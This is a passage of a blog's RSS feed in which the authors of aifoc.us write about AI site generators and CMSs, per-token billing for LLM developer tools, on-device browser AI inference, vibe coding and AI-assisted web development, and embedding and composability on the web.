<p>Are these generated sites the most beautiful and creative representation of the web? No, not yet. Are they better than being hosted in a walled garden? 100%! This is a massive positive for the web. The Web has always been easier to build for than native platforms, but it&rsquo;s never been as easy as posting your presence on Facebook. CMS&rsquo;s made it easier and I believe that Canvas&rsquo; or the new breed of web-design tools are going to massively lower the cost and complexity of getting a good web presence online.</p>
<p>So where do the current CMSs and hosting platforms innovate?</p>
<p>I think it&rsquo;s tough. For a huge number of sites, where it&rsquo;s a person&rsquo;s local small business then people don&rsquo;t need the full suite of services that CMSs and hosted CMSs offer, but in a lot of cases that is what they have to pick.</p>
<p>The new crop of tooling is showing that you can quickly iterate on designs that are custom and personal to each individual, so I think there will need to be a move away from the cookie-cutter theme templates and enable people to personalise their own experiences instantly.</p>
<p>I can also imagine improvements to instant iteration on entire site design and smoothing out the ability to experiment for free. I don&rsquo;t know the usage of <a href="https://wordpress.org/playground/">WordPress Playground</a>, but my own experience with it is that I can get a feel for how everything works in wordpress without having to subscribe to any service, or give my credit-card (or any of the other things companies do to try and get you to convert into a paying customer).</p>
<p>Price is one area that I hope there is a lot of competition. It&rsquo;s one of the biggest reasons I hear for people not to put a presence online. Yes there are issues today with <a href="/token-slinging/">tokens</a> as a unit of cost, but the costs of generation are coming down. At the same time the <a href="https://aifoc.us/latency/">latency</a> is improving so much that it&rsquo;s not just the cost of running the service, the cost to the person using the tool drops dramatically (I can try 10 designs in an hour vs 1 in an evening)</p>
<p>Domain names might also be another opportunity for improvement a the recurring annual cost and a point of confusion for many people.</p>
<p>I&rsquo;m not in the CMS business directly, so you can see that I&rsquo;m short of specific ideas, other than I think we are going to see a lot more competition coming through and that I think this is good for the industry&hellip; mostly&hellip;.</p>
<p>I&rsquo;d love to get your thoughts on the state of the CMS ecosystem and where you think the opportunities are. <a href="mailto:paul@aifoc.us">Hit me up</a>! For a future edition of aifoc.us, I think there will be a knock-on effect to the agencies that service small businesses so I&rsquo;m starting to think about how the Agency ecosystem be impacted and maybe where it needs to change.</p>
<hr>
<p><em>Thank you to Terry Pollard spotting a number of typos and errors in this post.</em></p>
]]></content:encoded></item><item><title>token slinging</title><link>https://aifoc.us/token-slinging/</link><pubDate>Mon, 30 Jun 2025 10:00:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/token-slinging/</guid><description>&lt;p>17 years ago I discovered Google App Engine. It was the first truly scalable &amp;ldquo;serverless&amp;rdquo; platform that I had ever seen. I could just write an HTTP handler and it would scale to meet the demand.&lt;/p>
&lt;p>It was also the first time in computing where I experienced a direct relationship with the cost of my code running. Prior to this every service I built was compartmentalized to a physical server. I was used to building software and algorithms for this model. Database contention, process contention, C10k, etc, were all things that I had to plan for. Yes, we developed your algorithms to avoid those problems, but we tended to scale by estimating the total QPS per box and when you hit a limit you would just buy another box and stick it in the rack.&lt;/p></description><content:encoded><![CDATA[<p>17 years ago I discovered Google App Engine. It was the first truly scalable &ldquo;serverless&rdquo; platform that I had ever seen. I could just write an HTTP handler and it would scale to meet the demand.</p>
<p>It was also the first time in computing where I experienced a direct relationship with the cost of my code running. Prior to this every service I built was compartmentalized to a physical server. I was used to building software and algorithms for this model. Database contention, process contention, C10k, etc, were all things that I had to plan for. Yes, we developed your algorithms to avoid those problems, but we tended to scale by estimating the total QPS per box and when you hit a limit you would just buy another box and stick it in the rack.</p>
<p>App Engine however could scale to meet any demand I could throw at it. I just didn&rsquo;t have to worry about any of the physical limitations or other constraints that I had previously worked with. It was a new world for me. I just had to deal with this one weird thing: A new billing model based on <a href="https://web.archive.org/web/20090227045111/http://code.google.com/appengine/docs/quotas.html">CPU time</a>.</p>
<p>The more money that I could spend in the moment, the more access to CPU time I had. It was such an interesting model for me. What if I get popular? I&rsquo;m just using this as a side-project&hellip; In the &ldquo;old days&rdquo;, my box would just grind to a halt and I would make a decision to either upgrade the box or buy another one. Now, what should I do? Should I charge my customers using a similar model? How would I explain that?</p>
<p>Ultimately, I chose not to follow that model for billing my customers. I felt that my customers would have no understanding of the model and would instead say &ldquo;hey, it&rsquo;s not our fault you use too many cycles to process a request&rdquo;, and a normal per-month tiered SaaS model would be much easier. This model led me down a rabbit hole that I still reflect on a lot. My margin was the difference between a standard user and the compute it took to process their requests and this lead me down an optimization path that I never thought about before, but couldn&rsquo;t get out of my head. CPU time cost me real money, so I need to reduce it on a per-user basis.</p>
<p>I did some back-of-the-envelope calculations and I realized that if I shaved off 100ms of CPU from my request handler, I would save tens of dollars a day (this was a lot for me at the time). I started to think about how I could optimize my code to get the CPU time down, lots of micro-optimizations here and there, and as I deployed each new version and I could see the CPU time drop.</p>
<p>I felt like an absolute genius. <a href="https://glaforge.dev/posts/2011/09/01/google-app-engine-s-new-pricing-model/">Then AppEngine changed their billing model</a>&hellip;. hah.</p>
<p>Jump forward 17 years and I&rsquo;m building software and using LLMs all the time to help me. They chew through bootstrapping of projects, bug fixes and even new features. I&rsquo;m sold on the model and the gains that I personally get from it. Granted, I&rsquo;m not a typical engineer; I&rsquo;m a manager and I&rsquo;ve spent a lot of time <em>not building</em> things over the last couple of years, but these tools have changed my life.</p>
<p>It feels like a real moment of change. &ldquo;Normal Businesses&rdquo; can be relatively rational when it comes to controlling costs, so my logical assumption is that if the companies are spending the money (and I&rsquo;m hearing that they are), they have likely costed it out and they must feel that they are getting a return on investment. I hear from people in the wider-ecosystem that lots of companies have blanket deals with LLM providers to enable all of their employees to use LLMs all day, and when there isn&rsquo;t a corporate deal, some companies give their teams budgets of a hundred dollars <em>a day</em> to use these tools.</p>
<p>Inference trends seem to indicate that there is more usage happening. I find OpenRouter&rsquo;s trends fascinating. They are a service that provides access to a wide range of LLMs, and they have been tracking the usage of these models across their platform. You can see the trends in usage, <a href="https://openrouter.ai/rankings">the most popular models</a>, and even the <a href="https://openrouter.ai/#:~:text=View%20docs-,Top%20Apps,-Largest%20public%20apps">top applications that are using these models</a>.</p>
<figure><img src="/images/openrouter.png"
    alt="OpenRouter Inference Trends"><figcaption>
      <p>OpenRouter Inference Trends</p>
    </figcaption>
</figure>

<figure><img src="/images/openrouter-topapps.png"
    alt="OpenRouter Inference Trends - Top Apps for the month"><figcaption>
      <p>OpenRouter Inference Trends - Top Apps for the month</p>
    </figcaption>
</figure>

<p>Looking at the numbers today (June 18th), 1 trillion tokens are processed by Open Router alone in a week and looking at programming, <a href="https://openrouter.ai/rankings/programming?view=week">there&rsquo;s at least 500 billion tokens processed in a week</a>. And this is data from just one service. Mind blowing.</p>
<p>As LLMs chew through teraflops of compute, it seems like the token <em>is</em> the current best model for billing. When models are less intensive to run the tokens tend to be cheaper (Gemini Flash) and more expensive when they are doing more. Per token billing is the new CPU time billing.</p>
<p>It raises a number of questions for me as a web developer.</p>
<p>Firstly, for web developers selling a service that interfaces with an LLM how do you bill? Like CPU time, tokens just aren&rsquo;t a measure that any normal person will understand, and they should probably never have to understand. We are going to see a lot of iteration in this space. For example, I run an RSS summary service called <a href="https://tldr.express">tldr.express</a>. It&rsquo;s small enough that I can eat the cost of running every RSS feed that is subscribed to through the LLM. But when I reach 1000 users, then what? I don&rsquo;t think there is any way that I could add a margin on top of my direct token cost, I would have to think about a more traditional SaaS model and hope people use the service but not too much&hellip; Kinda like how I used to think about CPU time.</p>
<p>This per-token billing creates an incentive for service owners to move more of the processing <a href="/on-device">on-device</a> at the user&rsquo;s expense. I&rsquo;m not sure how I feel about this given the trade-off in terms of device capability and quality of today&rsquo;s models. As web developers we will need more tools that will let us eval and balance the quality of on-device processing vs the cost and quality of using various services.</p>
<p>Today, there is a lot of experimentation by the model providers in pricing models, with Pro and Ultra plans. I could imagine a world where some of the current AI Web APIs (like Summarize or Prompt) doesn&rsquo;t actually use the on-device model, but instead the browser recognizes that the user has a Pro account with a model provider and uses that to process the request. It&rsquo;s still moving the token cost of the LLM from the site owner to the user, but it&rsquo;s wrapped up in a more traditional billing model that the user understands. And with the added benefit that the results are higher quality because the models are significantly more capable than the on-device models.</p>
<p>Billing models for services aside, a bigger change that we are seeing is that for the first time in a long time the tools that we (Web Developers) use every day now have a cost associated tied directly with their usage and this is a huge change from the past.</p>
<p>I&rsquo;m old enough to remember buying Visual C++ so that I could build Windows apps with MFC (I lied a bit here, my Dad bought it for me). Visual Studio with MSDN was my next main-stay for professional development. These tools cost real money, but it was either a very expensive one-time purchase or an annual subscription (anyone remember the mounds of MSDN CD&rsquo;s?). Whether driven by Open Source, or tools coming in to the browser or just plain competition, Web Developers transitioned to expect that development environments and tool chains would be free (as in beer), or so low-cost that the price was negligible.</p>
<p>But this is changing in subtle ways. We are seeing an explosion of token-slinging services that cost significant amounts of cash. Cursor costs $20 a month for 500 requests (I think I get through 500 requests in a day sometimes.) Replit is per &ldquo;checkpoint&rdquo; and is <a href="https://blog.replit.com/effort-based-pricing">now adapting to &ldquo;effort&rdquo; based billing</a> — I find the effort-based billing particularly offensive because it assumes that they know they&rsquo;ve completed a goal, and when the tool makes clear mistakes it&rsquo;s incredibly frustrating. And then there are the purely token-processing tools like Cline and others. As I write this, there are now a number of CLI tools <a href="https://github.com/google-gemini/gemini-cli">Gemini</a>, <a href="https://openai.com/index/introducing-codex/">Codex</a> and <a href="https://www.anthropic.com/claude-code">Claude</a> that are exploring being able to attach their tool directly to your consumer account (Ultra accounts get more requests than Pro, and so on).</p>
<p>This entire space is a difficult set of trade-off&rsquo;s for web developers. You can feel incredibly productive and can see the output of it, and when things are going well, you don&rsquo;t want to stop. But at some point, you have to pay or stop. So, what do you do? You can look at cheaper models, or you can think about going <a href="/on-device">on-device</a> as a way to satiate the cost. Are you really trading cost for quality, though? How can you even determine quality other than vibes? This was the only reason I switched to Gemini Pro. The code felt better but I didn&rsquo;t have a real way of actually comparing it and I don&rsquo;t believe any of the benchmarks.</p>
<p>I don&rsquo;t know a single developer who today wants to produce a low-quality product or knowingly use a tool that outputs lower-quality code than another. Being able to determine this though is a real challenge and one that will increase as more developers find value in these tools.</p>
<p>Maybe this is just the same as picking a framework to use? You make a subjective decision in the guise of objective criteria: There are more developers, there are more libraries, my team will be more productive, etc etc.</p>
<p>I have a job that enables me to spend what I want to spend and see the benefits from it, but for a small individual developer or a small software shop, even $10 a day is a lot of money, and can equate to less than an hour of LLM usage so how should we think about our more junior folk or people starting out in the industry who don&rsquo;t have access to the funds to use these tools?</p>
<p>How do we think about emerging or weaker economies? Tokens aren&rsquo;t priced to the market they are being used in, they are attached to the dollar. If you&rsquo;re in a region that has lower salaries, lower revenues or has a currency that isn&rsquo;t as strong against the dollar, then you might struggle to be able to afford to use these tools even if the increase in productivity is significant.</p>
<p>We never did get out of the model that App Engine introduced. AWS just took it and made it number of requests <em>and</em> CPU time (GB seconds). Now, LLMs are doing the same thing but this time to the actual development costs and there might be an ever widening gap between those who can afford to use LLMs and those who can&rsquo;t.</p>
<p>These are all very interesting problems that we as a web industry will need to solve.</p>
]]></content:encoded></item><item><title>on-device</title><link>https://aifoc.us/on-device/</link><pubDate>Thu, 12 Jun 2025 23:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/on-device/</guid><description>&lt;p>The web browser is such an amazing concept. From the very first moment I used one, right up until today. You type in a URL and you can have something run on the server and then displayed in the browser. It got me hooked in 95, and keeps me hooked today. Back in the day, Perl was my jam. I loved to create login systems, e-commerce sites, email hosting providers. You name it, I could get the server to mash out HTML like nobody&amp;rsquo;s business.&lt;/p></description><content:encoded><![CDATA[<p>The web browser is such an amazing concept. From the very first moment I used one, right up until today. You type in a URL and you can have something run on the server and then displayed in the browser. It got me hooked in 95, and keeps me hooked today. Back in the day, Perl was my jam. I loved to create login systems, e-commerce sites, email hosting providers. You name it, I could get the server to mash out HTML like nobody&rsquo;s business.</p>
<p>When I was 17 I started a company called PCBware in the UK with two of my friends Chris and Ben. We were directors of a company and we felt like we could do anything&hellip; we even had a domain name! And what we thought was an awesome company name. It wasn&rsquo;t until someone said it sounded like you should be scared of PCs that we had some second thoughts.</p>
<figure><img src="/images/pcbware.png"
    alt="Earliest image I can find of PCBware&rsquo;s homepage in 1998"><figcaption>
      <p>Earliest image I can find of PCBware&rsquo;s homepage in 1998</p>
    </figcaption>
</figure>

<p>As we got more confident building software on the web and wrestling with Apache to automate the creation of websites, we morphed it into a hosting company that made it so that businesses could create a site quickly and have a presence online. I&rsquo;ve got fond memories of that time, the company (at least when I was there) was not successful, but it was a time when I could just focus on building&hellip; We timed it just right to jump on the the web.</p>
<p>The web had this very clear separation, logic ran on the server and you presented it in the UI. We&rsquo;d played around with JavaScript, JScript and DHTML, but the majority of what we would do in the client was rollover effects on images and some basic UI validation. All I wanted though was to be able to do more in the browser. Many of our potential customers wanted the page never to refresh. But many of the fundamental technologies and best practices just didn&rsquo;t exist at the time. <a href="https://en.wikipedia.org/wiki/XMLHttpRequest">XMLHttpRequest</a>&hellip; That&rsquo;s two years away!</p>
<p>While I was &ldquo;running&rdquo; the company, I was also at university (Hello to my John Moores friends!) and the email system they had was <a href="https://en.wikipedia.org/wiki/Outlook_on_the_web">Outlook</a>. I didn&rsquo;t have Outlook on my personal machine, but I did have a browser. I remember logging into it for the first time and boop! an email just appeard in my inbox&hellip;. I didn&rsquo;t refresh. What is this magic!?</p>
<p>There&rsquo;s been more seminal moments for me on the Web. Gmail. Google Maps. Google Docs multi-user. That early 2000&rsquo;s period of the web changed what we expected of the web and it was the combination of on-server and on-device execution and the expectation of interactivity locally in the browser has not stopped. Today we are able to store data sandboxed inside the origin, run applications completely offline, install them on to the device, be able to access hardware on the users devices and now run &ldquo;Machine Code&rdquo; via WASM and GPU shaders.</p>
<p>This progression is interesting to me because the story is less about the raw technology and instead more of the change that it enables to the ecosystem. Yes, the web-runtime wasn&rsquo;t as fast as some app experiences, so you might never ship your AAA game on the web, but the performance of devices was never a reason not to do on-device for the vast majority of experiences and we&rsquo;ve got all manner of experiences now running in the browser, all the way up to Photoshop. All of the <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> principles are what makes the web the best platform to deploy on.</p>
<p>As I noted in <a href="https://aifoc.us/transition/">transition</a>, I&rsquo;d tracked on-device AI for sometime because of projects like <a href="https://ai.google.dev/edge/mediapipe/solutions/setup_web">MediaPipe</a>, <a href="https://www.tensorflow.org/js">Tensorflow</a> - it was incredibly neat to see real-time image segmentation etc, but it wasn&rsquo;t until ChatGPT launched that I dusted off my old machine-learning books and got back into thinking about what is might be possible in the browser. I went off and explored the ecosystem. I built a <a href="https://paul.kinlan.me/button-detector/">button detector using TFLite</a>&hellip; and it was incredibly exciting with a new classes of apps available to people all inside the browser and I realised that we&rsquo;re at a new tipping point in capability for the browser and what it can enable for people.</p>
<p>The web has always been an amazing ground for experimentation, I think it&rsquo;s due to the comparative ease of getting something running and sharing it with people. AI based experiments are no different, there are so many different ways to think about what on-device can mean, for example:</p>
<ol>
<li>Using a framework like TFlite, ONNX or <a href="https://huggingface.co/docs/transformers.js/en/index">Transformer.js</a> to load a custom model and run it in the browser, either via WASM or WebGPU.</li>
<li>The in-development <a href="https://webmachinelearning.github.io/webnn-intro/">WebNN</a> APIs that will in theory let you load and execute models in a standardised way against the hardware that the user has.</li>
<li>The <a href="https://developer.chrome.com/docs/extensions/ai/prompt-api">experimental prompt based APIs in Chrome</a> that are now multi-modal and let you have instant access to models like Gemini Nano or Phi.</li>
<li>The <a href="https://developer.chrome.com/docs/ai/built-in">built-in API like Chrome&rsquo;s use-case based APIs</a> (Summarize, Write, Rewrite) to do common tasks without having to download a model or even think about AI at all</li>
<li>Accessing a local-server that hosts models like <a href="https://ollama.com/">Ollama</a></li>
<li>Accessing OS-provided models (like what <a href="https://machinelearning.apple.com/research/apple-foundation-models-2025-updates#:~:text=Server%20foundation%20models.-,Foundation%20Models%20Framework,-The%20new%20Foundation">Apple just announced</a>)</li>
</ol>
<p>If I look at this list and go bottom to top, it seems to me that every operating system will come with a framework to load and run models, and likely preferring their own models by default. The ease of development for these local OS models combined with the models &ldquo;just being available&rdquo; will put pressure on tools like Ollama, which I suspect are in the process of being sherlocked (sher_llm_ocked?). The question for me is will these OS foundational systems allow for model choice either by the developer or the user? Given the lock-in we&rsquo;ve seen in the past, I suspect there won&rsquo;t be and I can&rsquo;t see a world where a regular person will install a model picker middleware.</p>
<p>If the browser has built-in APIs there&rsquo;s also a similar tension. The browser can provide it&rsquo;s own model, which is what we see happening now, or if the OS&rsquo;s have one, it might be able to defer to that. I suspect each browser vendor will want you to use their model.</p>
<p>If you want true customization or do things that aren&rsquo;t built-in then you are going to have to ship your own models to the client and use the browser provided APIs like WebNN or bring your own runtime (with WASM). This clearly has the most flexibility and a different set of tradeoffs. You have to download the model for each site (we don&rsquo;t have large-object caching model for the web) and hope that there is APIs for hardware acceleration. I expect what we will see develop here is that people will pioneer new models and capabilities and then once these become common use-cases they will be then built into the browser or the operating system.</p>
<p>As I explored these different classes of inference running on-device and why you (a developer) want them to be on-device, the answers tend to lean into the same areas that we&rsquo;ve been talking about for years on the web in relation to locally running experiences:</p>
<ul>
<li>They work offline. No connection required. Once you have the model you can just use it.</li>
<li>They are private. The data never leaves the device, so you don&rsquo;t have to worry about it being sent to a server and a company using your data to train their models (whether you believe their license or not)</li>
<li>They can be used in real-time scenarios where the round trip to a server would be too slow. For example, you can use on-device inference to do real-time image processing, speech recognition, or even text generation.</li>
</ul>
<p>But after speaking to a lot of businesses and developers there is something that I&rsquo;ve not really heard before for most on-device scenarios: Cost! Running models on-device can lower the cost for the business running the site. Specifically, Tokens can be expensive depending on the model and the number of users you have, so if the business no longer has to pay for server costs to run the inference, then that is a huge benefit.</p>
<p>Cost just hasn&rsquo;t been a thing that <em>I&rsquo;ve</em> seen really talked about when it comes to the web-experiences. Instead the narrative is about privacy, ownership of data and compute, resilience to the network, resilience to business failure, avoidance of big-tech etc. All of these are great reasons to build local-first, and cost being a factor for running models, and specifically LLMs, I think is a new vector worth looking at to see some of the challenges that we might face as an industry.</p>
<p>Depending on what you are doing, the models that you run on-device can be worse in both quality and performance. As a developer you are going to have to be responsible and decide where you make a trade-off? The cheaper (for your business) model or the quality of the answer? It will be impossible for a user to make a rational and informed decision about where to run the compute, so the natural thing that you might do as a developer is to have a router that looks at the query and determines the best place to run it? If you need a high-quality answer route it to the server. If you want low-cost, keep it on device. If the users device can&rsquo;t handle it, bump it to the cloud. It gets complex very quickly, and has a couple further issues that will need to be dealt with.</p>
<p>Web developers don&rsquo;t yet have the tools, or at least it&rsquo;s not yet in our workflows to benchmark models quality against cost and performance. There are some tools like Simon Willison&rsquo;s <a href="https://www.llm-prices.com/">llm-prices</a>, but there needs to be a lot more tooling to help us navigate this space. We need to be able to track the quality of the output of the models, the costs, the latency, and if we&rsquo;ve learnt anything from npm, when the version changes. For example, the models in Chrome&rsquo;s on-device APIs - be it the <a href="https://developer.chrome.com/docs/ai/prompt-api">prompt API</a> or the <a href="https://developer.chrome.com/docs/ai/built-in">built-in use-case APIs</a> - hide the model version information from the developer and the user. It can and will update as we make the models better (check <code>chrome:components</code> you will see the version information), so how do you manage this in a production environment?</p>
<p>On top of this, when developers and businesses market on-device anything, they normally say that because the data, the storage and the computation are on the user&rsquo;s device it&rsquo;s inherently more secure and more private. This is certainly true when we have the capabilities to run everything on device, however we now have performance and memory requirements that render potentially billions of devices unable to run models performantly (or at all) on-device. I&rsquo;m comfortable, I have a couple of beefy Mac&rsquo;s that can sling tokens about. But what about if you are someone that has to use a candy-bar phone? The spirit of the web is that everything that is on a URL is accessible irrespective of your device capabilities.</p>
<p>People are putting real and sensitive data into these tools, so if we are going to promote on-device as a real-thing then we need to either change the social contract with people and ensure if the marketing about your site says that the computation is done on device, then you can&rsquo;t (or shouldn&rsquo;t) be sending the data to a hosted service, or go further and enable the platform to make the input and output to models more opaque. Unfortunately, a web super-power: the origin model, is no help here. The origin model is great in that it stops other sites peaking into the data held on your site, but there is no guarantee that the data won&rsquo;t leave your device because the site owner programmed it that way. Observant readers might say &ldquo;Paul, this issue isn&rsquo;t about LLMs, it&rsquo;s been an issue for years&rdquo;, and you are correct. It&rsquo;s just that I don&rsquo;t think anyone has really considered it that much, and I think that given how some of our engagement might change, we should at least consider changes. Maybe there is something similar to CSP and opaque fetches plus tainting of the data (like Canvas) when you get a response from an LLM might help (i.e, you get a warning if the data is sent via a fetch or the user could block requests in the user-agent), or even <a href="https://www.w3.org/TR/webcrypto-2/#cryptokey-interface-internal-slots">Opaque objects like those defined by the WebCrypto API</a>, or even something like <a href="https://security.apple.com/documentation/private-cloud-compute">Apple&rsquo;s Private Cloud Compute</a> built into the platform. I don&rsquo;t actually know what the answer is here but it feels like something that would need more investigation because of the pressures developers will have to move compute off the device.</p>
<p>The web is the perfect medium to offer these types of experiences, so if we assume that this technology is better for people and it makes people more efficient or enables new workflows then it should be available to everyone irrespective of location or device-class so that it will enable new classes of computing all via the browser, then we are going to have to really deal with the fact that hybrid approaches will be required for a long time.</p>
<p>I love doing more directly in the browser I can&rsquo;t wait to see what new use cases that open up just like we saw when Outlook came to the web, or gmail or Google Docs and countless other innovations that were enabled by new APIs&hellip;. There&rsquo;s going to be a lot to work out still.</p>
]]></content:encoded></item><item><title>AI Assisted Web Development</title><link>https://aifoc.us/ai-assisted-webdev/</link><pubDate>Wed, 04 Jun 2025 16:00:06 +0000</pubDate><author>contact@aifoc.us (Andre Cipriani Bandarra)</author><guid>https://aifoc.us/ai-assisted-webdev/</guid><description>&lt;p>AI assisted programming is becoming more and more frequent amongst developers. Its usage ranges from asking AI tools like Gemini and pasting answers into the IDE, to using AI as a glorified auto complete, to full on vibe coding, delegating most of the code written to AI agents.&lt;/p>
&lt;p>Models are getting more capable and, but still not perfect. Developers are still ultimately responsible for the code produced, and should review it before publishing to avoid &lt;a href="https://futurism.com/problem-vibe-coding">nasty surprises&lt;/a> like &lt;a href="https://x.com/leojr94_/status/1901560276488511759">leaking API keys&lt;/a>. But it&amp;rsquo;s amazing to see how models like &lt;a href="https://deepmind.google/models/gemini/pro/">Gemini 2.5 Pro&lt;/a> are capable of building entire (even if reasonably simple) web applications from a one shot prompt, like &lt;a href="https://g.co/gemini/share/fec5ce76d958">this example&lt;/a> where my prompt was &lt;em>Build a force directed graph demo&lt;/em>.&lt;/p></description><content:encoded><![CDATA[<p>AI assisted programming is becoming more and more frequent amongst developers. Its usage ranges from asking AI tools like Gemini and pasting answers into the IDE, to using AI as a glorified auto complete, to full on vibe coding, delegating most of the code written to AI agents.</p>
<p>Models are getting more capable and, but still not perfect. Developers are still ultimately responsible for the code produced, and should review it before publishing to avoid <a href="https://futurism.com/problem-vibe-coding">nasty surprises</a> like <a href="https://x.com/leojr94_/status/1901560276488511759">leaking API keys</a>. But it&rsquo;s amazing to see how models like <a href="https://deepmind.google/models/gemini/pro/">Gemini 2.5 Pro</a> are capable of building entire (even if reasonably simple) web applications from a one shot prompt, like <a href="https://g.co/gemini/share/fec5ce76d958">this example</a> where my prompt was <em>Build a force directed graph demo</em>.</p>
<p>One thing to note, however, is that AI models are not equally performant for all programming languages and stacks. Because model performance depends on the availability training data for the model, AI models tend to be quite good for web development, and have the potential to boost the productivity of web developers more than other stacks.</p>
<p>Maybe that&rsquo;s because the web has been around for such a long time and the open nature of web implementations, there is plenty of training data available for training models for web development. Another characteristic that favours the web is that it excels in backward compatibility (remember <a href="https://www.spacejam.com/1996/">spacejam.com</a>, from &lsquo;96? Its still up an running), so even when a model produces slightly outdated code, it will generally still work, without issues.</p>
<p>Another point that makes the web a great platform to build with AI tooling is low-friction deployment. Because the web doesn&rsquo;t have review queues, or requirements, developers can easily deploy and their creations, iterate, and share them.</p>
<p>The combination of AI models capabilities on web development with lack of friction for deploying them is spurring a new type of developer, one that is first and foremost a vibe coder and frequently doesn&rsquo;t know other types of development.</p>
<p>This became clear to me when chatting with the founders of <a href="https://www.usecurling.com/">usecurling.com</a>, a Brazilian startup aiming at differentiating themselves by delivering products faster by using AI. The team there also hosts a closed vibe coding community where the vast majority of participants don&rsquo;t have a software development background, but are using tools like <a href="https://replit.com/">Replit</a> and <a href="https://lovable.dev/">Lovable</a> to build projects.</p>
<p>What those developers can achieve is, of course, limited to what the AI model can do. The team reported that those developers will often run into brick walls, either because they aren&rsquo;t able to get the AI tooling to implement what they want or because they run into issues, like security or scalability, when productionizing them.</p>
<p>And that&rsquo;s where their community comes in, it&rsquo;s a forum where the Curling AI team, who are experienced developers, can help vibe coders to overcome those issues.</p>
<p>AI Tooling does indeed lower the barrier of entry for web development, allowing people who otherwise wouldn&rsquo;t have the time or resources to learn, to effective realize their ideas. It also doesn&rsquo;t mean there will be less work for traditional developers. In fact, my view is quite the opposite. With a lower barrier of entry, the need for developers who can take over when AI tooling hits a brick wall will only grow.</p>
<p>Another interesting trend are developers who moved into leadership or management position, like CTOs, VPs, directors and managers, starting to build again, because AI tooling gives them the opportunity to quickly put together projects within the time they have left after dealing with other responsibilities that comes with those roles.</p>
<p>While, at one hand, this may be contributing to a <a href="https://leaddev.com/technical-direction/why-developers-and-their-bosses-disagree-over-generative-ai">dissonance between leadership and developers on generative AI</a>, it&rsquo;s also great to see AI bringing those developers back to building things, and excited about the future of web development.</p>
<p>An URL is a powerful tool that allows sharing web projects around. With more people becoming developers and publishing their creations on-line, I wonder if we will start seeing more directories where those developers can showcase their applications, and users can discover new ones - sort of an <a href="https://itch.io">itch.io</a>, but for web applications.</p>
<p>Maybe this won&rsquo;t make sense in today&rsquo;s world, but the concept of more people being able to transform their ideas into web applications, with reduced friction to build and deploy, reminds me of the early days of the web - distribution of native applications was always an issue, but the web allowed developers to share their creations with a simple link. AI Tooling is changing that by allowing more people to become developers, and that&rsquo;s great!</p>
]]></content:encoded></item><item><title>embedding</title><link>https://aifoc.us/embedding/</link><pubDate>Wed, 28 May 2025 10:59:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/embedding/</guid><description>&lt;p>No, not that &lt;a href="https://huggingface.co/spaces/hesamation/primer-llm-embedding">one&lt;/a>. The E in &lt;a href="https://paul.kinlan.me/slice-the-web/">SLICE&lt;/a> is for embedding content&amp;hellip;. Oh wait, that E was for ephemeral. Hmm, never mind. I guess this is the other E which is actually the C in SLICE. &amp;ldquo;Composable&amp;rdquo;. After &lt;a href="https://aifoc.us/a-link-is-all-you-need">linking&lt;/a> composability is one of the most critical features of the medium that is the web. It&amp;rsquo;s the only platform that I know of that enables expression by integrating live content from nearly any other site or service directly into the UI. Yes, we have APIs, but it&amp;rsquo;s the &lt;code>&amp;lt;iframe&amp;gt;&lt;/code> and &lt;code>&amp;lt;embed&amp;gt;&lt;/code> that have helped to make the web unique.&lt;/p></description><content:encoded><![CDATA[<p>No, not that <a href="https://huggingface.co/spaces/hesamation/primer-llm-embedding">one</a>. The E in <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> is for embedding content&hellip;. Oh wait, that E was for ephemeral. Hmm, never mind. I guess this is the other E which is actually the C in SLICE. &ldquo;Composable&rdquo;. After <a href="/a-link-is-all-you-need">linking</a> composability is one of the most critical features of the medium that is the web. It&rsquo;s the only platform that I know of that enables expression by integrating live content from nearly any other site or service directly into the UI. Yes, we have APIs, but it&rsquo;s the <code>&lt;iframe&gt;</code> and <code>&lt;embed&gt;</code> that have helped to make the web unique.</p>
<p>There&rsquo;s a story that I heard before joining Google, that our very first developer API was a way to embed Google Maps into your website. It wasn&rsquo;t that we invented an API, it was that the web made it easy to pull content from other sites and embed it into your own and lots of people wanted to do this. While embedding of maps is declining (according to BuiltWith), anywhere between <a href="https://trends.builtwith.com/mapping/Google-Maps">12-15% of the top 1 million sites</a> still embed Google Maps.</p>
<p>In &ldquo;<a href="/a-link-is-all-you-need/">A link is all you need</a>&rdquo; and <a href="/super-apps/">super-apps</a> I touched on the ability for LLMs to create or recall content on the fly and how it&rsquo;s potentially a huge shift for how we think about the web and in <a href="/ai-powered-site-mashups/">AI-powered site mashups</a> Andre Bandarra suggests that Agents will be able to create the ultimate mashup or sites and services because they attempt to solve for the user&rsquo;s goal.</p>
<p>If the only thing really stopping this is the <a href="/latency/">latency</a> of the LLMs to generate the UI then it is a &ldquo;when&rdquo; and not &ldquo;if&rdquo; question. We really need to think about some of the downstream implications of this.</p>
<p>One extreme is where there is a <a href="/super-apps/">super-app</a> and it is the agent that can do everything for the user, generating content and UIs on the fly to fulfil a goal. Where does the web sit in this? The web is a legacy fallback and it&rsquo;s not the web I want to see. Is there a possibility that an exchange of value could happen between the site and super-app? I believe that many site owners and businesses would want some way of keeping their brand, or enabling specific actions like up-sell on checkouts, so could we embed some functionality that brings my brand or service in front of the user in any site or app, including the super-app? Maybe it&rsquo;s a checkout form, or a registration page, or, well anything that needs a user-action.</p>
<figure><img src="/images/embedding.png"
    alt="Embedding"><figcaption>
      <p>Fictional example of embedding existing web functionality into a &lsquo;chat app&rsquo;</p>
    </figcaption>
</figure>

<p>In 2020, while on my team, Jason Miller documented the <a href="https://jasonformat.com/islands-architecture/">Island architecture</a> (first proposed by <a href="https://sylormiller.com/">Katie Sylor-Miller</a>). At the time if felt a logical extension to &ldquo;<a href="https://web.dev/learn/pwa/architecture/">AppShell</a>&rdquo;: Here&rsquo;s some static code and here&rsquo;s the dynamic bit — which on a technical level <em>is</em> what it describes, but at an architectural level it is something rather different. Islands are a way to think about how to compose your web app in to different bits of functionality. While still nascent, frameworks like <a href="https://fresh.deno.dev/docs/concepts/islands">Fresh</a> and <a href="https://docs.astro.build/en/concepts/islands/">Astro</a> have adopted this idea, it&rsquo;s still just a framework-level concept and not a platform-level primitive.</p>
<p>When I look at the extreme that is &ldquo;the super-app&rdquo;, it feels like embedding and composability need to be key parts of the future of the web, and it needs to something that developers and businesses can opt-in to and control to their brand and experience to as much as an extent as possible.</p>
